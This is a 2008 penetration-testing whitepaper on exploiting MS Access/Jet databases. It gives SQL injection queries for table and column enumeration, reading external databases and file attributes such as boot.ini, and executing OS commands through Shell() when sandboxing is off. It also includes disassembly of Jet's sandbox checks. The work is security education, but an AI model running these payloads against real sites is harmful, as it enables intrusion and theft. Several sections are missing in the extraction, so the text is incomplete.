Access Through Access
Access Through Access
Version 1.1, May 2008 Brett Moore, Network Intrusion Specialist [email protected]
WHITEPAPER
Contents 1. 2. 2.1. 2.2. 2.3. 3. 3.1. 3.2. 3.3. 3.4. 4. 4.1. 4.2. 4.3. 5. 6. 6.1. 6.2. 6.3. 6.4. 6.5. 6.6. 7. 7.1. 7.2. 7.3. 7.4. 8. 9. 10. Introduction .............................................................................................................................................. 3 MS Access Default Tables ...................................................................................................................... 4 Determining The Version Of Access Database ..................................................................................... 6 Determining The Database Engine ....................................................................................................... 6 Database Connection Strings ................................................................................................................ 6 Jet Versions ............................................................................................................................................. 7 Jet File and Service Pack Versions ....................................................................................................... 7 Operating System Installed Versions .................................................................................................... 7 Components That Install Unsafe Versions of MS Jet ............................................................................ 8 Relevant MS 4.0 Jet Security Notices ................................................................................................... 8 SandBoxing .............................................................................................................................................. 9 How SandBoxing Works ........................................................................................................................ 9 Safe Functions ..................................................................................................................................... 11 Determining If SandBoxing Is Enabled ................................................................................................ 12 Inline Evaluation With The Pipe Character ......................................................................................... 13 Standard SQL Injection ......................................................................................................................... 14 Retrieving Information.......................................................................................................................... 14 The Sample Vulnerable Query ............................................................................................................ 14 Table Enumeration .............................................................................................................................. 14 Column Number Enumeration ............................................................................................................. 15 Column Enumeration ........................................................................................................................... 15 Column Data Type Enumeration ......................................................................................................... 16 Accessing External Databases ............................................................................................................ 18 Reading Local Files ............................................................................................................................. 19 Connecting To MS SQL ....................................................................................................................... 20 Mapping The Local Drive ..................................................................................................................... 21 Writing To Files .................................................................................................................................... 22 Operating System Commands ............................................................................................................. 23 Non SQL MS Jet Exploitation ............................................................................................................... 25 References.............................................................................................................................................. 26
7 October 2008
Page 2 of 26
WHITEPAPER
1.
Introduction
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test. The aim of this paper is to bring a lot of disparate information together into one guide. MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage. Therefore is often encountered during Web Application reviews and the potential for exploitation should be realised. This paper will outline methods to identify different versions of MS Jet, some SQL Injection methods to use during tests, and some other techniques to access files, servers, and potentially gain command access.
7 October 2008
Page 3 of 26
WHITEPAPER
2.
Access databases contain a number of hidden/system tables. These can be viewed through MS Access by checking the relevant options on the view tab of the tools menu. To obtain a list of tables contained within the database, from within MS Access, execute the following query; SELECT Name FROM msysobjects WHERE Type = 1 These tables are generally not accessible through queries external to MS Access. Those that can be accessed are marked under the Query column of the following table. Readable tables are used in the examples within this document and are referenced as <DefaultSystemTable>. Access 97 Table MSysAccessObjects MSysACEs MSysModules MSysModules2 MSysObjects X Flags, Form, Module, Name, ReplicationVersion, Type, TypeInfo, Version Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szColumn, szObject, szReferencedColumn, szReferencedObject, szRelationship Query X Fields Data, ID ACM, FInheritable, ObjectId, SID
MSysQueries MSysRelationships
Access 2000 Table MSysAccessObjects MSysAccessXML MSysACEs MSysObjects Query X X Fields Data, ID ID, LValue, ObjectGuid, ObjectName, Property, Value ACM, FInheritable, ObjectId, SID Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szColumn, szObject, szReferencedColumn, szReferencedObject, szRelationship
MSysQueries MSysRelationships
Access 2002-2003 Table MSysAccessStorage MSysAccessXML MSysACEs MSysObjects Query X X Fields DateCreate, DateUpdate, Id, Lv, Name, ParentId, Type ID, LValue, ObjectGuid, ObjectName, Property, Value ACM, FInheritable, ObjectId, SID Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id,
7 October 2008
Page 4 of 26
WHITEPAPER
Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type MSysQueries MSysRelationships Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szColumn, szObject, szReferencedColumn, szReferencedObject, szRelationship
Access 2007 Table MSysAccessStorage MSysACEs MSysComplexColumns MSysComplexType_Attachment MSysComplexType_Decimal MSysComplexType_GUID MSysComplexType_IEEEDouble MSysComplexType_IEEESingle MSysComplexType_Long MSysComplexType_Short MSysComplexType_Text MSysComplexType_UnsignedByte MSysNavPaneGroupCategories MSysNavPaneGroups MSysNavPaneGroupToObjects MSysNavPaneObjectIDs MSysObjects X X X X Filter, Flags, Id, Name, Position, SelectedObjectID, Type Flags, GroupCategoryID, Id, Name, Object Type, ObjectID, Position Flags, GroupID, Icon, Id, Name, ObjectID, Position ID, Name, Type Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szColumn, szObject, szReferencedColumn, szReferencedObject, szRelationship Query X Fields DateCreate, DateUpdate, Id, Lv, Name, ParentId, Type ACM, FInheritable, ObjectId, SID ColumnName, ComplexID, ComplexType, ConceptualTableID, FlatTableID
MSysQueries MSysRelationships
7 October 2008
Page 5 of 26
WHITEPAPER
7 October 2008
Page 6 of 26
WHITEPAPER
3.
Jet Versions
7 October 2008
Page 7 of 26
WHITEPAPER
Windows Vista
SP1
4.0.9704.0
Yes
The above table shows installed versions on base OS installs, and with different service packs installed. MS Jet and updates are also distributed with other office components, which may or may not affect the accuracy of the results above. If you have other version information, please send to [email protected]
This is not a full list of vulnerabilities affecting MS Jet, but are the ones relevant to current versions.
7 October 2008
Page 8 of 26
WHITEPAPER
4.
SandBoxing
Sandboxing mode prevents the use of unsafe VBA functions. The following registry key is created after installing the relevant version of service pack. Service Pack 3 for MS Jet 3.51 \\HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\3.5\engines\SandboxMode Service Pack 3 for MS Jet 4.0 \\HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\engines\SandboxMode ACE 2007 \\HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Access Connectivity Engine\Engines\SandboxMode The settings for this registry key are Setting 0 1 2 (default) 3 Description Sandbox mode is disabled at all times. Sandbox mode is used for Access applications, but not for non-Access Applications. Sandbox mode is used for non-Access applications, but not for Access Applications. Sandbox mode is used at all times. Note: ACE 2007 sets the default value to 3.
Function CJetESInstance::DetermineRegSandBoxMode 1B808FBE 55 PUSH EBP 1B808FBF 8BEC MOV EBP,ESP 1B808FC1 83EC 20 SUB ESP,20 1B808FC4 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX 1B808FC7 C745 F4 02000000 MOV DWORD PTR SS:[EBP-C],2 1B808FCE 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 1B808FD2 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 1B808FD5 50 PUSH EAX 1B808FD6 68 9894801B PUSH msjtes40.1B809498 ; ASCII "SOFTWARE\Microsoft\Jet\4.0\Engines" 1B808FDB 68 02000080 PUSH 80000002 1B808FE0 FF15 0810801B CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>] 1B808FE6 85C0 TEST EAX,EAX 1B808FE8 75 43 JNZ SHORT msjtes40.1B80902D 1B808FEA C745 E8 04000000 MOV DWORD PTR SS:[EBP-18],4 1B808FF1 8D45 E8 LEA EAX,DWORD PTR SS:[EBP-18] 1B808FF4 50 PUSH EAX 1B808FF5 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
7 October 2008 Page 9 of 26
WHITEPAPER
1B808FF8 1B808FF9 1B808FFC 1B808FFD 1B808FFF 1B809004 1B809007 1B80900D 1B809010 1B809014 1B80901A 1B80901E 1B809024 1B809027 1B80902D 1B809030 1B809033 1B809037 1B80903D 1B809041 1B809047 1B80904B 1B809051 1B809056 1B80905C 1B80905E 1B809060 1B809067 1B80906A 1B80906B 1B80906C 1B809070
PUSH EAX LEA EAX,DWORD PTR SS:[EBP-10] PUSH EAX PUSH 0 PUSH msjtes40.1B8094C0 ; ASCII "SandBoxMode" FF75 EC PUSH DWORD PTR SS:[EBP-14] FF15 0410801B CALL DWORD PTR DS:[<&ADVAPI32.RegQueryValueExA>] 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 0F85 8E1E0100 JNZ msjtes40.1B81AEA8 837D F0 04 CMP DWORD PTR SS:[EBP-10],4 0F85 841E0100 JNZ msjtes40.1B81AEA8 FF75 EC PUSH DWORD PTR SS:[EBP-14] FF15 1810801B CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKey>] 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX 837D E0 00 CMP DWORD PTR SS:[EBP-20],0 0F84 8F1E0100 JE msjtes40.1B81AECC 837D E0 01 CMP DWORD PTR SS:[EBP-20],1 0F84 8E1E0100 JE msjtes40.1B81AED5 837D E0 02 CMP DWORD PTR SS:[EBP-20],2 0F85 A81E0100 JNZ msjtes40.1B81AEF9 68 3485801B PUSH msjtes40.1B808534 ; ASCII "msaccess.exe" FF15 2810801B CALL DWORD PTR DS:[<&KERNEL32.GetModuleHandleA>] 85C0 TEST EAX,EAX 75 0C JNZ SHORT msjtes40.1B80906C C745 FC 01000000 MOV DWORD PTR SS:[EBP-4],1 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] C9 LEAVE C3 RETN 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 ^EB F5 JMP SHORT msjtes40.1B809067
50 8D45 F0 50 6A 00 68 C094801B
IsSafeVBIntrinsicSW IsSafeVBIntrinsicSW is called when a function is passed in the query. It determines the range of known safe functions to compare against and then calls FindIntrinsic. This function loops through the safe functions checking to find a match for the function passed to it. File Msjtes40.dll (Windows 2003 MSJet40.dll 4.0.9505.0) PUSH EBP MOV EBP,ESP SUB ESP,10 AND DWORD PTR SS:[EBP-C],0 AND DWORD PTR SS:[EBP-4],0 MOV EAX,DWORD PTR SS:[EBP+C] CMP EAX,DWORD PTR SS:[EBP+10] JG SHORT msjtes40.1B80DF46 MOV EAX,DWORD PTR SS:[EBP+10] SUB EAX,DWORD PTR SS:[EBP+C] SAR EAX,1 MOV ECX,DWORD PTR SS:[EBP+C] ADD ECX,EAX MOV DWORD PTR SS:[EBP-C],ECX MOV EAX,DWORD PTR SS:[EBP-C] PUSH DWORD PTR DS:[EAX*4+1B830AE0]
Page 10 of 26
Function FindIntrinsic 1B80DEE4 55 1B80DEE5 8BEC 1B80DEE7 83EC 10 1B80DEEA 8365 F4 00 1B80DEEE 8365 FC 00 1B80DEF2 8B45 0C 1B80DEF5 3B45 10 1B80DEF8 7F 4C 1B80DEFA 8B45 10 1B80DEFD 2B45 0C 1B80DF00 D1F8 1B80DF02 8B4D 0C 1B80DF05 03C8 1B80DF07 894D F4 1B80DF0A 8B45 F4 1B80DF0D FF3485 E00A831B
7 October 2008
WHITEPAPER
1B80DF14 1B80DF17 1B80DF1C 1B80DF1D 1B80DF1E 1B80DF21 1B80DF25 1B80DF27 1B80DF2B 1B80DF2D 1B80DF30 1B80DF31 1B80DF34 1B80DF36 1B80DF39 1B80DF3A 1B80DF3D 1B80DF3F 1B80DF46 1B80DF4A 1B80DF50 1B80DF54 1B80DF5A 1B80DF5D 1B80DF60 1B80DF63 1B80DF64
; Push the pointer into the compare list PUSH DWORD PTR SS:[EBP+8] ; Push our function E8 19FDFFFF CALL msjtes40.1B80DC35 ; __wcsicmp 59 POP ECX 59 POP ECX 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 7C 0F JL SHORT msjtes40.1B80DF36 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 7E 12 JLE SHORT msjtes40.1B80DF3F 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 40 INC EAX 8945 0C MOV DWORD PTR SS:[EBP+C],EAX ^EB BC JMP SHORT msjtes40.1B80DEF2 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 48 DEC EAX 8945 10 MOV DWORD PTR SS:[EBP+10],EAX ^EB B3 JMP SHORT msjtes40.1B80DEF2 C745 FC 01000000 MOV DWORD PTR SS:[EBP-4],1 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 0F84 1DEE0000 JE msjtes40.1B81CD6D 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 0F84 48EE0000 JE msjtes40.1B81CDA2 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10] C9 LEAVE C2 0C00 RETN 0C FF75 08
7 October 2008
Page 11 of 26
WHITEPAPER
Note: The functions marked in orange are considered safe, but can not be called through an SQL query.
7 October 2008
Page 12 of 26
WHITEPAPER
5.
MS Jet 3.5 As noted in the paper by Matthew Astley and Rain Forest Puppy (http://www.wiretrip.net/rfp/txt/rfp9901.txt), the vertical bar, or pipe character, ( | ) could be used in MS Jet 3.5 as an inline evaluation operator. This could be used in any string and would cause the database engine to evaluate the contents before parsing the rest of the query string. Query: SELECT email FROM users WHERE id ='|5+4|' ; Returns the record with id=9 SELECT email FROM users WHERE id ='|func()|' ; Will execute func() MS Jet 4.0 We have not been able to replicate this with MS Jet 4.0, and can not find any reference material to suggest that it is still available. Error 80040e14 The following error message can be seen in MS Jet 3.5 and MS Jet 4.0. Error Reponse: Microsoft JET Database Engine error '80040e14' Invalid use of vertical bars in query expression This error message is caused when the vertical bar is placed outside of surrounding quotes. As an example the following SQL queries will cause the error. Query: SELECT email FROM users WHERE id =''| SELECT email FROM users WHERE id =|1+1|
7 October 2008
Page 13 of 26
WHITEPAPER
6.
7 October 2008
Page 14 of 26
WHITEPAPER
7 October 2008
Page 15 of 26
WHITEPAPER
If the * has been used in the select statement then the GROUP BY clause can not be used, and the following error will be shown if it is attempted. Error Reponse: Microsoft JET Database Engine (0x80040E21) Cannot group on fields selected with '*'. In this scenario it is possible to discover one of the column names through the following query. Query: SELECT * FROM users WHERE username ='1' HAVING sum('1')='1' and password='' Error Reponse: Microsoft JET Database Engine (0x80040E21) You tried to execute a query that does not include the specified expression 'ID' as part of an aggregate function. The discovery of this column name can help in the next stage, brute forcing, as some applications prefix columns with a standard value eg: fld, t, txt_ Discovery of the other valid column names is through a brute force approach. The following query can be used in brute force attempts to determine if a column exists in the table that is been accessed. If the requested column does not exist, an error is raised. Query: SELECT * FROM users WHERE username ='1' AND <ColumnName> = '1' and password='' Error Reponse: Microsoft JET Database Engine (0x80040E10) No value given for one or more required parameters. Method 3 Discovery of the valid column names in other tables, not the one been accessed, is through a brute force approach. The following query can be used in brute force attempts to determine if a column exists in any known table. If the requested column does not exist, an error is raised. Query: SELECT * FROM users WHERE username ='1' UNION SELECT <ColumnName>, NULL, FROM <TableName> WHERE '1'='1' and password='' Error Reponse: Microsoft JET Database Engine (0x80040E10) No value given for one or more required parameters.
7 October 2008
Page 16 of 26
WHITEPAPER
The data contained in the columns of the database is never displayed in error messages. Data enumeration can be done through using a union to display the data, or through blind SQL injection.
7 October 2008
Page 17 of 26
WHITEPAPER
7.
MS Jet provides the ability to retrieve data from databases external to the current database. This is done using the IN clause within the FROM syntax of a select statement. Query: SELECT id FROM users WHERE username ='1' UNION SELECT id FROM <table> IN '<path to database>' WHERE '1'='1' and password='' Data from a remote database that is accessible through an SMB or WEBDAV share can be accessed if the network allows it. ISAM Connections Non access database can be opened by specifying the database type in either of the following formats; ... FROM Table IN "" [<Type>; DATABASE=<Path To Database>;]; ... FROM Table IN "<Path To Database>" "Type" ... FROM [<Type>;DATABASE=<Path To Database>].[<Table>] The available types to access database types other than access are listed under the following registry key; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\ISAM Formats OR HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Access Connectivity Engine\ISAM Formats The ISAM connections use the engines listed under the respective \Engine registry key. ODBC Connections ODBC connections can be made using the following format; ... FROM [ODBC; DRIVER=<Driver>] Available ODBC connection types are listed under the following registry key; HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI MS Jet will not allow ODBC connections to MS Access drivers; it expects you to use the ISAM. Generic Connection Errors Error Reponse: Microsoft JET Database Engine error '80004005' Could not find installable ISAM. Reason: The specified ISAM is not installed, or it has been spelt incorrectly. Error Reponse: Microsoft JET Database Engine error '80004005' You cannot use ODBC to import from, export to, or link an external Microsoft Jet or ISAM database table to your database. Reason: You tried to use ODBC to open a MS Jet connection.
7 October 2008
Page 18 of 26
WHITEPAPER
7 October 2008
Page 19 of 26
WHITEPAPER
7 October 2008
Page 20 of 26
WHITEPAPER
7 October 2008
Page 21 of 26
WHITEPAPER
7 October 2008
Page 22 of 26
WHITEPAPER
8.
If sandboxing is DISABLED, or can be bypassed, then it is possible to use the following functions to execute operating system commands. CurDir[(drive)] Returns a Variant (String) representing the current path. Query: Select name from users where id ='1' union select curdir() from msysaccessobjects where '1'='1' Dir[(pathname [, attributes] )] Returns a String representing the name of a file, directory, or folder that matches a specified pattern or file attribute, or the volume label of a drive. Query: Select name from users where id ='1' union select dir('c:\ ') from msysaccessobjects where '1'='1' Environ( { envstring | number } ) Returns the String associated with an operating system environment variable. Query: Select name from users where id ='1' union select environ(1) from msysaccessobjects where '1'='1' FileDateTime(pathname) Returns an Integer representing the attributes of a file, directory, or folder. Query: Select name from users where id ='1' union select filedatetime('c:\boot.ini') from msysaccessobjects where '1'='1' FileLen(pathname) Returns a Long specifying the length of a file in bytes Query: Select name from users where id ='1' union select filelen('c:\boot.ini') from msysaccessobjects where '1'='1' GetAttr(pathname) Returns an Integer representing the attributes of a file, directory, or folder. Query: Select name from users where id ='1' union select getattr('c:\ ') from msysaccessobjects where '1'='1' Shell(pathname [, windowstyle ] ) Runs an executable program and returns a Variant (Double) representing the program's task ID if successful, otherwise it returns zero. Query: Select name from users where id ='1' union select shell('<file to run>') from msysaccessobjects where '1'='1'
7 October 2008
Page 23 of 26
WHITEPAPER
The file will be executed under the context of the server, usually the IIS anonymous user. This can prevent access to files such as cmd.exe on Windows 2003 and greater. If execute access is denied the following error will be returned. Error Reponse: Microsoft JET Database Engine error '80040e14' Invalid procedure call
7 October 2008
Page 24 of 26
WHITEPAPER
9.
MS Jet has had a number of vulnerabilities over the years. Some of these are in the SQL syntax and others, as mentioned in section 3.4 are related to the database file format. Despite Microsofts reluctance to release security patches for the database format bugs, it appears that they have changed their mind and a patch is imminent. This section includes some scenarios where MS Jet vulnerabilities, specifically the file format ones, can be exploited through applications other than Microsoft Access itself. Microsoft IIS As is detailed in section 7, an SQL injection vulnerability can be used to request data from an external database. A lack of egress filtering could allow the web server to connect to an attacker controlled file, which was designed to exploit one of the file based vulnerabilities.
OpenOffice.org The OpenOffice database application allows for connecting to an external database using ODBC or ADO. By specifying an ADO connection to a remote Access database file it is possible to exploit one of the file based vulnerabilities. If the target machine has MS Jet 3.5x installed, then an ADO connection string specifying the vulnerable versions of Jet can be used. Combining this with a query using the Shell() function, can lead to command execution. This type of exploitation affects any application that allows for the linking in or connecting to an Access based database.
7 October 2008
Page 25 of 26
WHITEPAPER
10. References
Advisory: NT ODBC Remote Compromise http://www.wiretrip.net/rfp/txt/rfp9901.txt Access 12's new data engine http://blogs.msdn.com/access/archive/2005/10/13/480870.aspx Jet Expression Can Execute Unsafe Visual Basic for Applications Functions http://support.microsoft.com/kb/239104 How to configure Jet 4.0 to prevent unsafe functions from running in Access 2000 and Access 2002 http://support.microsoft.com/kb/239482 How to configure Jet 4.0 to prevent unsafe functions from running in Access 2003 http://support.microsoft.com/kb/294698 Functions and properties in Access 2007 blocked by sandbox mode http://office.microsoft.com/en-us/access/HA012301901033.aspx Use sandbox mode in Access 2007 http://office.microsoft.com/en-us/access/HA101674291033.aspx Updated version of Microsoft Jet 3.5 available for download http://support.microsoft.com/kb/172733 How to obtain the latest service pack for the Microsoft Jet 4.0 Database Engine http://support.microsoft.com/default.aspx/kb/239114 How To Handle Quotes and Pipes in Concatenated SQL Literals http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q178070 How To Query for Literal Special Characters in a Where Clause http://support.microsoft.com/kb/q147687/ List of reserved words in Jet 4.0 http://support.microsoft.com/?id=248738 2007 Office System Driver: Data Connectivity Components http://www.microsoft.com/downloads/details.aspx?FamilyID=7554F536-8C28-4598-9B72EF94E038C891&displaylang=en MS Access Online Help http://office.microsoft.com/en-us/access/CH100621381033.aspx Time-Based Blind SQL Injection with Heavy Queries http://www.microsoft.com/technet/community/columns/secmvp/sv0907.mspx MS Access SQL Injection Cheat Sheet http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
7 October 2008
Page 26 of 26